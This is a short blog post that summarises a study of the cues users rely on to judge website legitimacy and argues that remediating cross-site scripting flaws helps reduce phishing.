Read a paper titled “Why Phishing Works” a couple of days back. It provides some very cool analysis of how users develop trust in websites and when this trust causes people to fall prey to phishing attacks. They break users’ strategies for determining website legitimacy into five different levels or categories:
- Security indicators in website content only
- Content and domain name only
- Content and addresses, plus HTTPS
- All of the above, plus padlock icon
- All of above, plus certificates
Let’s face it – if users only look at website content then there may be no hope for them. There is basically nothing that can be done to help prevent phishing attacks against these folks except for user education.
But – for all the other user groups preventing cross-site scripting (XSS) attacks against web applications will block attackers from using those applications to support phishing attacks. XSS flaws let attackers abuse the site itself (identified by the domain name, URL and potentially even HTTPS-served content) and if you take that power away users have a fighting chance.
Asserting “fixing XSS flaws helps to prevent phishing” is certainly not news, but this article provides actual numbers of the impact based on user behavior studies. Great ammunition if you have to make a case for remediating application security vulnerabilities before implementing the next great feature.
dan _at_ denimgroup.com